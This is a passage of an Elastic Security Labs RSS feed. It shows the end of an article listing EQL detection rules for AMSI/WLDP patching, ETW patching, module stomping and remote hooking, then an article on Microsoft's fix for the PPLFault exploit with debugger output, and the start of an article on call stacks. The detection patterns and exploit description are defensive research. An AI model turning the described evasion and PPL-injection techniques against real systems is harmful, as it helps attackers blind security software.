<p>Identifies calls to the VirtualProtect API where the call stack does not originate from its equivalent NT syscall, NtProtectVirtualMemory:</p>
<pre><code>api where 

 process.Ext.api.name : &quot;VirtualProtect*&quot; and 

 not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: (&quot;*ntdll.dll!NtProtectVirtualMemory*&quot;, &quot;*ntdll.dll!ZwProtectVirtualMemory*&quot;)) 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image5.png" alt="VirtualProtect via Random Indirect Syscall rule match examples" /></p>
<h3>Image Hollow from Unbacked Memory</h3>
<pre><code>api where process.Ext.api.behaviors == &quot;hollow_image&quot; and 

  process.Ext.api.name : &quot;VirtualProtect*&quot; and 

  process.Ext.api.summary : &quot;*.dll*&quot; and 

  process.Ext.api.parameters.size &gt;= 10000 and process.executable != null and 

  process.thread.Ext.call_stack_summary : &quot;*Unbacked*&quot;
</code></pre>
<p>Below is an example of matches on <code>wwanmm.dll</code> module stomping, which replaces its memory content with a malicious payload:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image2.png" alt="Image Hollow from Unbacked Memory rule match examples" /></p>
<h3>AMSI and WLDP Memory Patching</h3>
<p>Identifies attempts to modify the permissions of, or write to, the Microsoft Antimalware Scan Interface or Windows Lock Down Policy related DLLs in memory to alter their behavior and evade malicious-content checks:</p>
<pre><code>api where

 (
  (process.Ext.api.name : &quot;VirtualProtect*&quot; and 
    process.Ext.api.parameters.protection : &quot;*W*&quot;) or

  process.Ext.api.name : &quot;WriteProcessMemory*&quot;
  ) and

 process.Ext.api.summary : (&quot;* amsi.dll*&quot;, &quot;* mpoav.dll*&quot;, &quot;* wldp.dll*&quot;) 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image6.png" alt="AMSI and WLDP Memory Patching rule match examples" /></p>
<h3>Evasion via Event Tracing for Windows Patching</h3>
<p>Identifies attempts to patch Microsoft Event Tracing for Windows (ETW) via memory modification:</p>
<pre><code>api where process.Ext.api.name :  &quot;WriteProcessMemory*&quot; and 

process.Ext.api.summary : (&quot;*ntdll.dll!Etw*&quot;, &quot;*ntdll.dll!NtTrace*&quot;) and 

not process.executable : (&quot;?:\\Windows\\System32\\lsass.exe&quot;, &quot;\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image4.png" alt="Evasion via Event Tracing for Windows Patching rule match examples" /></p>
<h3>Windows System Module Remote Hooking</h3>
<p>Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:</p>
<pre><code>api where process.Ext.api.name : &quot;WriteProcessMemory&quot; and  

process.Ext.api.behaviors == &quot;cross-process&quot; and 

process.Ext.api.summary : (&quot;*ntdll.dll*&quot;, &quot;*kernelbase.dll*&quot;)
</code></pre>
<p>Below is an example of matches on <a href="https://github.com/CCob/ThreadlessInject">ThreadlessInject</a>, a new process injection technique that hooks an exported function in a remote process to gain shellcode execution (avoiding the creation of a remote thread):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image3.png" alt="ThreadlessInject example detecting via the Windows System Module Remote Hooking rule" /></p>
<h2>Conclusion</h2>
<p>Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and, optionally, placing it directly in their hands without any hidden filtering assumptions.</p>
<p><a href="https://www.elastic.co/kr/guide/en/security/current/release-notes.html">Stay tuned</a> for the call stack features in upcoming releases of Elastic Security.</p>
<h2>Resources</h2>
<h3>Rules released with 8.11:</h3>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_amsi_or_wldp_bypass_via_memory_patching.toml">AMSI or WLDP Bypass via Memory Patching</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_call_stack_spoofing_via_synthetic_frames.toml">Call Stack Spoofing via Synthetic Frames</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_evasion_via_event_tracing_for_windows_patching.toml">Evasion via Event Tracing for Windows Patching</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_memory_protection_modification_of_an_unsigned_dll.toml">Memory Protection Modification of an Unsigned DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_network_activity_from_a_stomped_module.toml">Network Activity from a Stomped Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_evasion_via_invalid_code_signature.toml">Potential Evasion via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_an_exception_handler.toml">Potential Injection via an Exception Handler</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_asynchronous_procedure_call.toml">Potential Injection via Asynchronous Procedure Call</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_thread_call_stack_spoofing.toml">Potential Thread Call Stack Spoofing</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_injection_via_mapping.toml">Remote Process Injection via Mapping</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_manipulation_by_suspicious_process.toml">Remote Process Manipulation by Suspicious Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_thread_context_manipulation.toml">Remote Thread Context Manipulation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_activity_from_a_control_panel_applet.toml">Suspicious Activity from a Control Panel Applet</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_api_call_from_a_script_interpreter.toml">Suspicious API Call from a Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/persistence_suspicious_api_from_an_unsigned_service_dll.toml">Suspicious API from an Unsigned Service DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_call_stack_trailing_bytes.toml">Suspicious Call Stack Trailing Bytes</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_heap_allocation.toml">Suspicious Executable Heap Allocation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_memory_permission_modification.toml">Suspicious Executable Memory Permission Modification</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_protection_fluctuation.toml">Suspicious Memory Protection Fluctuation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml">Suspicious Memory Write to a Remote Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_ntdll_memory_write.toml">Suspicious NTDLL Memory Write</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_null_terminated_call_stack.toml">Suspicious Null Terminated Call Stack</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_kernel32_memory_protection.toml">Suspicious Kernel32 Memory Protection</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml">Suspicious Remote Memory Allocation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_from_virtual_disk_or_usb.toml">Suspicious Windows API Call from Virtual Disk or USB</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_direct_syscall.toml">Suspicious Windows API Call via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_rop_gadgets.toml">Suspicious Windows API Call via ROP Gadgets</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_proxy_call.toml">Suspicious Windows API Proxy Call</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml">VirtualProtect API Call from an Unsigned DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_call_via_nttestalert.toml">VirtualProtect Call via NtTestAlert</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_indirect_random_syscall.toml">VirtualProtect via Indirect Random Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_rop_gadgets.toml">VirtualProtect via ROP Gadgets</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_api_via_a_callback_function.toml">Windows API via a CallBack Function</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_system_module_remote_hooking.toml">Windows System Module Remote Hooking</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/photo-edited-01.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Inside Microsoft's plan to kill PPLFault]]></title>
            <link>https://www.elastic.co/kr/security-labs/inside-microsofts-plan-to-kill-pplfault</link>
            <guid>inside-microsofts-plan-to-kill-pplfault</guid>
            <pubDate>Fri, 15 Sep 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.]]></description>
            <content:encoded><![CDATA[<p>On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.</p>
<p>The PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the <a href="https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide">Microsoft Virus Initiative</a> are allowed to run their products at the <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">less-trusted Anti-Malware PPL level</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/PPL-Table.jpg" alt="A simplified diagram of the hierarchy of PPL levels" /></p>
<p>A few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (<strong>WinTcb-Light</strong>). Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as <strong>csrss.exe</strong>) and their complex kernel-mode counterparts (such as <strong>win32k.sys</strong>) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes <strong>WinTcb-Light</strong>, mitigating tampering and injection attacks. <a href="https://twitter.com/aionescu">Alex Ionescu</a> stated it clearly in 2013:</p>
<blockquote>
<p>Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, <a href="http://j00ru.vexillium.org/?p=1393">discovered by j00ru</a>, and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In <a href="http://forum.xda-developers.com/showthread.php?t=2092158">Windows 8.1 RT</a>, this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. <a href="http://j00ru.vexillium.org/?p=1455">Similar</a> Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.</p>
</blockquote>
<p>To reduce the attack surface, Microsoft runs most of their PPL code with less privilege than <strong>WinTcb-Light</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/image4.png" alt="PPL processes in Windows 11 22H2, as seen in Process Explorer" /></p>
<p>Microsoft does not consider PPL to be a <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">security boundary</a>, meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically <a href="https://itm4n.github.io/the-end-of-ppldump/">addressed</a> some such <a href="https://x.com/GabrielLandau/status/1683854578767343619?s=20">vulnerabilities</a> on a less-urgent basis.</p>
<h3>Loading code into PPL processes</h3>
<p>To load code into a PPL process, it must be signed by special certificates. This applies to both executables (process creation) and libraries (DLL loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.</p>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format">Portable Executable</a> (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:</p>
<ol>
<li>An application calls <strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw">LoadLibrary</a></strong>, passing the path to the DLL to be loaded.</li>
<li><strong>LoadLibrary</strong> calls into the loader within NTDLL (e.g. <strong>ntdll!LdrLoadDll</strong>), which opens a handle to the file using an API such as <strong>NtCreateFile</strong>.</li>
<li>The loader then passes this file handle to <strong><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntcreatesection">NtCreateSection</a></strong>, asking the kernel memory manager to create a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">section object</a> which describes how the file is to be mapped into memory. A section object is also known as a <a href="https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping">file mapping object</a> in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images">executable image</a> (aka <a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga">SEC_IMAGE</a>), which can only be created from PE files.</li>
<li>Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function <strong>MiValidateSectionCreate</strong> relies on the Code Integrity module <strong>ci.dll</strong> to handle the requisite cryptography and <a href="https://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a> policy.</li>
<li>The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct <a href="https://en.wikipedia.org/wiki/Page_table">page table entries</a> with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.</li>
<li>The kernel returns the new section handle to the loader in NTDLL.</li>
<li>The NTDLL loader then asks the kernel memory manager to map a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">view of the section</a> into the process address space via the <strong><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwmapviewofsection">NtMapViewOfSection</a></strong> syscall. The memory manager complies.</li>
<li>Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. The details of this are out of scope.</li>
</ol>
<h3>Page hashes</h3>
<p>In the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - <a href="https://en.wikipedia.org/wiki/Memory_paging">paging</a>.</p>
<p>Unmodified pages belonging to file-backed sections (including <strong>SEC_IMAGE</strong>) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because <strong>SEC_IMAGE</strong> sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.</p>
<p>PE files may be optionally built with the <a href="https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170"><strong>/INTEGRITYCHECK</strong></a> flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls <strong>MiValidateInPage</strong> to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting <a href="https://en.wikipedia.org/wiki/Data_degradation">bit rot</a> in the page file and a few types of attacks. Beyond <strong>/INTEGRITYCHECK</strong> images, page hashes are <a href="https://twitter.com/DavidLinsley11/status/1190810926762450944">also enabled</a> for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.</p>
<p><em><strong>Note:</strong> It is possible to create a <strong>SEC_IMAGE</strong> section from a file with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences">user-writable references</a>, a tactic employed by techniques like <a href="https://jxy-s.github.io/herpaderping/">Process Herpaderping</a>. The existence of user-writable references means that a file could be modified after the image section is created.  When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See <a href="https://www.microsoft.com/en-us/security/blog/2022/06/30/using-process-creation-properties-to-catch-evasion-techniques/">this Microsoft article</a> for more information about user-writable references.</em></p>
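<p>The <strong>/INTEGRITYCHECK</strong> linker flag sets the <code>IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY</code> bit (<code>0x0080</code>) in the <code>DllCharacteristics</code> field of the PE optional header. As a rough sketch (not the code Windows itself uses), checking whether a binary requests this enforcement looks like:</p>

```python
import struct

IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY = 0x0080  # the /INTEGRITYCHECK bit

def has_forced_integrity(pe_bytes: bytes) -> bool:
    """Check the /INTEGRITYCHECK bit in a PE image's DllCharacteristics."""
    # e_lfanew (offset of the "PE\0\0" signature) lives at 0x3C in the DOS header.
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    # The optional header follows the 4-byte signature and 20-byte COFF header;
    # DllCharacteristics sits at offset 70 for both PE32 and PE32+.
    opt = e_lfanew + 4 + 20
    (dll_characteristics,) = struct.unpack_from("<H", pe_bytes, opt + 70)
    return bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY)
```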
<h3>Exploitation</h3>
<p>In September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two <a href="https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability">zero-day</a> vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named <a href="https://github.com/gabriellandau/PPLFault">PPLFault</a> and <a href="https://github.com/gabriellandau/PPLFault#godfault">GodFault</a>, respectively, along with their source code. These exploits allow malware to <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection">bypass LSA protection</a>, terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">this article</a> for more details on their impact.</p>
<p>The admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the <a href="https://learn.microsoft.com/en-us/windows/win32/api/_cloudapi/">Cloud Filter API</a> to violate immutability assumptions of files backing <strong>SEC_IMAGE</strong> sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as <strong>WinTcb-Light</strong>, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get <strong>WinTcb-Light</strong> code execution, then exploits the kernel’s trust of <strong>WinTcb-Light</strong> processes to modify kernel memory, granting itself full read-write access to physical memory.</p>
<p>Though MSRC <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">declined</a> to take any action on these vulnerabilities, the Windows Defender team has <a href="https://twitter.com/PhilipTsukerman/status/1683861340207607813?s=20">shown interest</a>. PPLFault and GodFault were released at <a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">Black Hat Asia</a> in May 2023 alongside a mitigation to stop these exploits called <a href="https://github.com/gabriellandau/PPLFault/tree/main/NoFault">NoFault</a>.</p>
<h3>Mitigation</h3>
<p>On September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function <strong>MiValidateSectionCreate</strong> which enables page hashes for all images that reside on remote devices. Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/Bindiff.jpg" alt="BinDiff comparison of MiValidateSectionCreate in builds 25936 and 25941" /></p>
<p>Decompiled into C, the new code looks like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/New-Code-In-IDA.jpg" alt="New check added in Windows build 25941" /></p>
<p>When PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WER-Event-Log.jpg" alt="PPLFault failing in build 25941 with STATUS_IN_PAGE_ERROR (0xC0000006)" /></p>
<p>PPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned <a href="https://github.com/gabriellandau/PPLFault/tree/main/NoFault">NoFault</a> mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.</p>
<p>Tracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with <strong>STATUS_INVALID_IMAGE_HASH (0xC0000428)</strong>. This is later converted to <strong>STATUS_IN_PAGE_ERROR (0xC0000006)</strong>.</p>
<pre><code>0: kd&gt; g
Breakpoint 1 hit
CI!CiValidateImagePages+0x360:
0010:fffff805`725028b4 b8280400c0      mov     eax,0C0000428h
7: kd&gt; k
 # Child-SP          RetAddr               Call Site
00 fffff508`1b4a6dc0 fffff805`72502487     CI!CiValidateImagePages+0x360
01 fffff508`1b4a6f90 fffff805`6f2f1bbd     CI!CiValidateImageData+0x27
02 fffff508`1b4a6fd0 fffff805`6ee35de5     nt!SeValidateImageData+0x2d
03 fffff508`1b4a7020 fffff805`6efa167b     nt!MiValidateInPage+0x305
04 fffff508`1b4a70d0 fffff805`6ef9fffe     nt!MiWaitForInPageComplete+0x31b
05 fffff508`1b4a71d0 fffff805`6ef68692     nt!MiIssueHardFault+0x3fe
06 fffff508`1b4a72e0 fffff805`6f0a784b     nt!MmAccessFault+0x3b2
07 fffff508`1b4a7460 00007fff`ccf71500     nt!KiPageFault+0x38b
08 000000b6`776bf1b8 00007fff`d5500ac0     0x00007fff`ccf71500
09 000000b6`776bf1c0 00000000`00000000     0x00007fff`d5500ac0
7: kd&gt; !error C0000428
Error code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the 
 digital signature for this file. A recent hardware or software change 
 might have installed a file that is signed incorrectly or damaged, or 
 that might be malicious software from an unknown source.
</code></pre>
<h3>Comparing behavior</h3>
<p>With the fix introduced in build 25941, the final vulnerable build is 25936. Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:</p>
<pre><code>bp /w &quot;&amp;CI!CipValidatePageHash == @rcx&quot; CI!CipValidateImageHash 
 &quot;dt _FILE_OBJECT @r8 FileName; g&quot;
</code></pre>
<p>This command generates the following WinDbg output for build 25936, before the fix:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25936.jpg" alt="Build 25936 using page hashes only for services.exe" /></p>
<p>Here is the WinDbg output for build 25941, which includes the fix:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25941.jpg" alt="Build 25941 using page hashes for both services.exe and the PPLFault payload DLL loaded over SMB" /></p>
<h3>Conclusion</h3>
<p>Despite taking <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">longer than it perhaps should</a>, it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the riskier types. For example, the PreviousMode kernel exploit mitigation <a href="https://twitter.com/GabrielLandau/status/1597001955909697536?s=20">spotted in Insider last November</a> still hasn’t reached GA, even after <em>at least</em> 10 months.</p>
<p><em>Special thanks to <a href="https://twitter.com/0gtweet">Grzegorz Tworek</a> for his help reverse engineering some kernel functions.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/photo-edited-04@2x.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Peeling back the curtain with call stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks</link>
            <guid>peeling-back-the-curtain-with-call-stacks</guid>
            <pubDate>Wed, 13 Sep 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Defend provides over <a href="https://github.com/elastic/protections-artifacts/tree/main/behavior/rules">550 rules</a> (and counting) to detect and stop malicious behavior in real time on endpoints. We recently <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">added kernel call stack enrichments</a> to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously improving false positives, false negatives, and alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.</p>
<h2>What is a call stack?</h2>
<p>When a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. These return addresses can be retrieved through a process known as a <a href="https://learn.microsoft.com/en-us/windows/win32/debug/capturestackbacktrace">stack walk</a>, which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.</p>
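<p>The same concept exists in any language runtime. As a toy illustration (ordinary Python introspection, not a Windows kernel stack walk), the following captures the chain of callers from inside the innermost function and reports it most-recent-first:</p>

```python
import traceback

def capture_callers() -> list:
    """Return the function names on the current call stack, innermost first."""
    # extract_stack lists frames oldest-first; reverse them to match the
    # reverse-chronological order a stack walk reports.
    frames = traceback.extract_stack()
    return [frame.name for frame in reversed(frames)]

def function_c() -> list:
    return capture_callers()

def function_b() -> list:
    return function_c()  # a return address inside function_b is saved here

def function_a() -> list:
    return function_b()  # a return address inside function_a is saved here
```

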